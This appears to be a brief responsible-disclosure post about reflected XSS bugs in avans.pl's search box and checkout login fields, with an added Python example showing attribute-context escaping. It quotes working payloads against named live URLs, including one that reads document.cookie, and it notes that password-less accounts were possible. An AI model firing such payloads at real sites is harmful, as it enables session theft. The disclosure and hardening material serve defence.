Simple reflected XSS bug in Avans’ search box:
http://www.avans.pl/produkty.html?query=XSS"/><script>alert('XSS')</script>
Another set of unfiltered input fields was in:
https://www.avans.pl/koszyk-logowanie.html
which is step 3/4 after adding a product to the cart. Filling those fields with the standard value:
"/><script>alert(document.cookie)</script>
redirects to:
https://www.avans.pl/koszyk-adres.html
which pops an alert box.
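The attribute breakout behind both findings and the output encoding that stops it, as an added example that is not part of the original post and not Avans' code. The template (a value echoed into an input's value attribute) is an assumption inferred from the payload's leading `"/>`; the payloads are the ones quoted above.

```python
import html
from html.parser import HTMLParser

# Payload quoted in the post; the leading "/> closes the attribute value and its tag.
PAYLOAD = "\"/><script>alert('XSS')</script>"

# Hypothetical template (assumption): the submitted value is echoed into a value attribute.
TEMPLATE = '<form action="/produkty.html"><input type="text" name="query" value="{}"/></form>'


def render_vulnerable(query: str) -> str:
    """Reflect the parameter verbatim (the behaviour the post describes)."""
    return TEMPLATE.format(query)


def render_hardened(query: str) -> str:
    """Encode for an HTML attribute context: &, <, > and both quote characters."""
    return TEMPLATE.format(html.escape(query, quote=True))


class TagCollector(HTMLParser):
    """Records start tags and value attributes as an HTML parser sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.values.extend(v for k, v in attrs if k == "value")

    # <input .../> is self-closing; record it the same way as a start tag.
    handle_startendtag = handle_starttag


def inspect(markup: str):
    """Return (start tags, value attributes) parsed from the markup."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.values


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        tags, values = inspect(render(PAYLOAD))
        print(f"{name}: tags={tags} value={values}")
```

In the hardened output the parser sees no script element and the input's value round-trips to the exact text the user typed, so the search term still displays correctly.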
Bonus: It was possible to create an account without a password.
The bugs were short-lived thanks to Avans.pl's quick reaction. Good job.